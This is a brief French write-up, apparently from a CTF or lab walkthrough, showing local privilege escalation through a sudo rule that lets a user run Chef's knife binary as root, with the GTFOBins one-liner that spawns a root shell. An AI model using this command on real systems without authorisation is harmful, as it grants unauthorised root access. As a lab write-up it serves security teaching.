En exécutant sudo -l, on observe que l'utilisateur peut exécuter le binaire knife en tant que root :
sudo -l
knife
Ce binaire est référencé sur GTFOBins comme permettant une élévation de privilèges.
Exploitation
Utilisez la commande ci-dessus pour obtenir un shell root.
Mis à jour il y a 1 an
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
